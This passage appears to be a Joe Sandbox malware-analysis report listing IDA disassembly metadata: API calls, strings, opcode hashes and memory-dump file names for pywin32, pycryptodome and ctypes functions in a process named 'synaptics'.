                                                                                                                                                                                                              • String ID: :GetSecurityDescriptorSacl$GetSecurityDescriptorSacl$GetSecurityDescriptorSacl - invalid sd
                                                                                                                                                                                                              • API String ID: 2327843493-3167575759
                                                                                                                                                                                                              • Opcode ID: 2994412f1b00a66df23667e7ec2d85a6cd991ec3ad1085a1ea5d6e08afc403d2
                                                                                                                                                                                                              • Instruction ID: ea1369f8e5c5bc9526cf956c13b7b34bee823d35596d5a3c6e1c747182c96400
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2994412f1b00a66df23667e7ec2d85a6cd991ec3ad1085a1ea5d6e08afc403d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B113377914101ABDB01EF28EC41BAB7BE8EF96609F444469FC4881132F729966CD7A3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:GetSecurityDescriptorDacl), ref: 6BF470BC
                                                                                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(?), ref: 6BF470D6
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SetSecurityDescriptorGroup - invalid sd,00000000), ref: 6BF470E6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GetSecurityDescriptorDacl, xrefs: 6BF4710E
                                                                                                                                                                                                              • SetSecurityDescriptorGroup - invalid sd, xrefs: 6BF470E1
                                                                                                                                                                                                              • :GetSecurityDescriptorDacl, xrefs: 6BF470B3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DescriptorError@@ParseSecurityTupleU_object@@ValidWin_
                                                                                                                                                                                                              • String ID: :GetSecurityDescriptorDacl$GetSecurityDescriptorDacl$SetSecurityDescriptorGroup - invalid sd
                                                                                                                                                                                                              • API String ID: 2327843493-161903415
                                                                                                                                                                                                              • Opcode ID: 717ab5f72a8f8845508e93931adc6c6c3cb7c99e6d221e4ec949c3d596686568
                                                                                                                                                                                                              • Instruction ID: 439239a4506a19f72039c9ed28a55a1b95c945799000dcd4a8aab3c7e99e4311
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 717ab5f72a8f8845508e93931adc6c6c3cb7c99e6d221e4ec949c3d596686568
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B113377914201ABD701EF28ED01BAB7BE8EF95609F440469FC4892132F739966CC7A3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:GetSecurityDescriptorGroup), ref: 6BF4700C
                                                                                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(?), ref: 6BF47026
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(GetSecurityDescriptorGroup - invalid sd,00000000), ref: 6BF47036
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GetSecurityDescriptorGroup, xrefs: 6BF47059
                                                                                                                                                                                                              • :GetSecurityDescriptorGroup, xrefs: 6BF47003
                                                                                                                                                                                                              • GetSecurityDescriptorGroup - invalid sd, xrefs: 6BF47031
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DescriptorError@@ParseSecurityTupleU_object@@ValidWin_
                                                                                                                                                                                                              • String ID: :GetSecurityDescriptorGroup$GetSecurityDescriptorGroup$GetSecurityDescriptorGroup - invalid sd
                                                                                                                                                                                                              • API String ID: 2327843493-1740808346
                                                                                                                                                                                                              • Opcode ID: 411082771f7c433de563c6f9e205ef640bafd38fce5835f907d66c476f232699
                                                                                                                                                                                                              • Instruction ID: 231a615fede18f55cd9e7cee041e907c1d2f578df16c86bace7b10c52185ae3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 411082771f7c433de563c6f9e205ef640bafd38fce5835f907d66c476f232699
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B50148779141016FDB00EB2CED01A9B7BA8EF5560AF444875F94881232F33A966C97B3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6BF4A096
                                                                                                                                                                                                              • _Py_FatalErrorFunc.PYTHON310(PyWinThreadState_Ensure,Can not setup thread state, as have no interpreter state), ref: 6BF4A0B2
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008), ref: 6BF4A0BD
                                                                                                                                                                                                              • _Py_FatalErrorFunc.PYTHON310(PyWinThreadState_Ensure,Out of memory allocating thread state.), ref: 6BF4A0D3
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BF4A0E0
                                                                                                                                                                                                              • PyThreadState_New.PYTHON310 ref: 6BF4A0EC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • PyWinThreadState_Ensure, xrefs: 6BF4A0AD, 6BF4A0CE
                                                                                                                                                                                                              • Can not setup thread state, as have no interpreter state, xrefs: 6BF4A0A8
                                                                                                                                                                                                              • Out of memory allocating thread state., xrefs: 6BF4A0C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFatalFuncValue$AllocLocalState_Thread
                                                                                                                                                                                                              • String ID: Can not setup thread state, as have no interpreter state$Out of memory allocating thread state.$PyWinThreadState_Ensure
                                                                                                                                                                                                              • API String ID: 1925565299-3250566352
                                                                                                                                                                                                              • Opcode ID: 069a1e63ec1119c8f74fcbfe5a3e75fdcee991802eae18d5e40e0c400e3759b2
                                                                                                                                                                                                              • Instruction ID: 5a84c0927c6357cfdc9506655ae5c44df6c05c414c545b47a7d67b3752658d19
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 069a1e63ec1119c8f74fcbfe5a3e75fdcee991802eae18d5e40e0c400e3759b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAF067738606109BDB26AF6CAC08B013FF0FB36352B004020F68291576D72AE6288B62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8220D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82215
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8221D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF82225
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8222D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82233
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82243
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8224C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82255
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8225E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 92a6d0b8226e11e267fd40553b4b1466e2373e97b760961b1773782107a82bda
                                                                                                                                                                                                              • Instruction ID: 710480b4d4dbf7f86d53c20f3681d7ac7e7da398b0d363587f04df53f5849be4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92a6d0b8226e11e267fd40553b4b1466e2373e97b760961b1773782107a82bda
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D641C2739043018BE7109F15EC8174BB7B2FF81729F040979EC5956260E73AEA2D9B93
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000040), ref: 6BF83B99
                                                                                                                                                                                                                • Part of subcall function 6BF85450: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t_nw >= a_nw + 2,D:\a\pycryptodome\pycryptodome\src\multiply_32.c,0000008F,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF8547D
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854A3
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854B8
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,?), ref: 6BF85520
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t[PREDIV_WORDS_64-1] <= 1,D:\a\pycryptodome\pycryptodome\src\mont.c,0000015E), ref: 6BF83E4F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • nw == 4, xrefs: 6BF83B0A
                                                                                                                                                                                                              • t[PREDIV_WORDS_64-1] <= 1, xrefs: 6BF83E4A
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF83E45
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF83B2A
                                                                                                                                                                                                              • m0 == 1, xrefs: 6BF83B2F
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF83B05
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_wassert$memset
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c$m0 == 1$nw == 4$t[PREDIV_WORDS_64-1] <= 1
                                                                                                                                                                                                              • API String ID: 3586389565-218816793
                                                                                                                                                                                                              • Opcode ID: 87680909cb8d46c1dfd0fb3f904d1218e6cf9306b9732cebea7af2a3110cbe3a
                                                                                                                                                                                                              • Instruction ID: befb052fba921787f293138f4b85c568598b8cee981f555e3591c2b8557192c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87680909cb8d46c1dfd0fb3f904d1218e6cf9306b9732cebea7af2a3110cbe3a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FE15872A087029FD314CF38C851A5AB7F1BF88314F149A2DE999D7760E739E594CB82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000060), ref: 6BF83830
                                                                                                                                                                                                                • Part of subcall function 6BF85450: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t_nw >= a_nw + 2,D:\a\pycryptodome\pycryptodome\src\multiply_32.c,0000008F,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF8547D
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854A3
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854B8
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,?), ref: 6BF85520
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t[PREDIV_WORDS_64-1] <= 1,D:\a\pycryptodome\pycryptodome\src\mont.c,00000215), ref: 6BF83A2A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • m0 == 0x0000000100000001ULL, xrefs: 6BF837AE
                                                                                                                                                                                                              • t[PREDIV_WORDS_64-1] <= 1, xrefs: 6BF83A25
                                                                                                                                                                                                              • nw == WORDS_64, xrefs: 6BF83789
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF83784
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF837A9
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF83A20
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_wassert$memset
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c$m0 == 0x0000000100000001ULL$nw == WORDS_64$t[PREDIV_WORDS_64-1] <= 1
                                                                                                                                                                                                              • API String ID: 3586389565-232852193
                                                                                                                                                                                                              • Opcode ID: 0885a93778d7bc7614801ee6ff295a3d8cf0ebd08e57f92fb6545d52e58047ac
                                                                                                                                                                                                              • Instruction ID: 8f4d5e0619418a01be9139742fbd38a3ffdb59efca1cc0907618b03e49e6837f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0885a93778d7bc7614801ee6ff295a3d8cf0ebd08e57f92fb6545d52e58047ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99C1A271A087529BD718CF38C9516AAB7F1BFD8318F048A2DE499D3761E734E5848B81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mem_$Err_MallocMemory$Free
                                                                                                                                                                                                              • String ID: %zd)$%zd,$0bal
                                                                                                                                                                                                              • API String ID: 3736073920-3311324910
                                                                                                                                                                                                              • Opcode ID: f21280ea2d84a74f46cf2172566337da7512c497e91ff35ee3804884e308a26b
                                                                                                                                                                                                              • Instruction ID: a363f4c6c72530d8e9f885a9a4d739f6d5357bd4e2d300e2476bed333c8761b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f21280ea2d84a74f46cf2172566337da7512c497e91ff35ee3804884e308a26b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851F975A081459B8F05CFE8D4506EDFBF2EF8A3447198299D846EB702DB32E907C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyObject_New.PYTHON310(6C0B5D90), ref: 6C0A2D54
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A2DA0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocObject_
                                                                                                                                                                                                              • String ID: wrong type
                                                                                                                                                                                                              • API String ID: 3074230233-2191655096
                                                                                                                                                                                                              • Opcode ID: 708881d0a49e57da016f9cd13936420b505f14b7b71fdf2b953aeb3db166cbaf
                                                                                                                                                                                                              • Instruction ID: 65c39cad1e87a467ee1d7a2b31b9df7dcbce8717a16653752962c28f092c83dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 708881d0a49e57da016f9cd13936420b505f14b7b71fdf2b953aeb3db166cbaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C34139317041028FDB04CBEAD848B9673F9EF8122DB144535E81DDBA52DB32E8968791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyObject_New.PYTHON310(6C0B5D90), ref: 6C0A2B94
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A2BE0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocObject_
                                                                                                                                                                                                              • String ID: wrong type
                                                                                                                                                                                                              • API String ID: 3074230233-2191655096
                                                                                                                                                                                                              • Opcode ID: 03b802e2f342f2d718cad97d83aa04ed7a5f5a163c6e7cd2b9866908553e5737
                                                                                                                                                                                                              • Instruction ID: 7587a9034cbcd6619d9d1725ccfba300af60d7d221cb518ee9c0eda9c325b486
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03b802e2f342f2d718cad97d83aa04ed7a5f5a163c6e7cd2b9866908553e5737
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 004138717041025BDB04CBEAD949B9673F9EF8132DF244635E91DC7A52DB32E8068B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyObject_IsInstance.PYTHON310(?,?), ref: 6C0A1C0F
                                                                                                                                                                                                              • PyObject_IsInstance.PYTHON310(?,?), ref: 6C0A1C55
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(?,6C0B690C,6C0B5D90), ref: 6C0A1CA5
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A1CCE
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,expected %s instance instead of %s,?,?), ref: 6C0A1CF5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object_$Instance$AttrDeallocErr_FormatLookup
                                                                                                                                                                                                              • String ID: ???$expected %s instance instead of %s$expected %s instance instead of pointer to %s
                                                                                                                                                                                                              • API String ID: 1373686093-1082101171
                                                                                                                                                                                                              • Opcode ID: b1a9e6f582392322ed50ea2a72cdf330a77c8fdcb839a3de297f3c08629fcd6d
                                                                                                                                                                                                              • Instruction ID: 1d5847b19126e807fbb81547ffe6efd48520e36fd4164a022debb7fef40dde57
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1a9e6f582392322ed50ea2a72cdf330a77c8fdcb839a3de297f3c08629fcd6d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A131EF71300205FBDB108AD99E40F69B3F8EF05269F148665E92DE6A52D732D8228B94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A4A33
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A4A4A
                                                                                                                                                                                                              • PyCallable_Check.PYTHON310(?), ref: 6C0A4A7A
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,restype must be a type, a callable, or None), ref: 6C0A4A93
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(?,6C0B66C4,?), ref: 6C0A4AAD
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A4ADE
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A4AED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • restype must be a type, a callable, or None, xrefs: 6C0A4A8C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$AttrCallable_CheckErr_LookupObject_String
                                                                                                                                                                                                              • String ID: restype must be a type, a callable, or None
                                                                                                                                                                                                              • API String ID: 1528254987-4008198047
                                                                                                                                                                                                              • Opcode ID: 1a114a0888b25d8474f00dc7d8fb99fdddc51b0d8b27aae3f6e3e91d5fa5b09a
                                                                                                                                                                                                              • Instruction ID: 116d6ea841113ca7eac43b67378b5b31b3eb5bd7ecdcb6e26b605358037e68ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a114a0888b25d8474f00dc7d8fb99fdddc51b0d8b27aae3f6e3e91d5fa5b09a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C531D87AA04611ABD700DFD8D80078573F8AF1137CF154625DE69A7682EB33E807CB95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA434,can't delete SECURITY_ATTRIBUTES attributes), ref: 6BF45F15
                                                                                                                                                                                                              • PyUnicode_AsUTF8.PYTHON310(?), ref: 6BF45F2A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6BF45FAE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • The object is not a PySECURITY_DESCRIPTOR object, xrefs: 6BF45F83
                                                                                                                                                                                                              • SECURITY_DESCRIPTOR, xrefs: 6BF45F37
                                                                                                                                                                                                              • can't delete SECURITY_ATTRIBUTES attributes, xrefs: 6BF45F0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
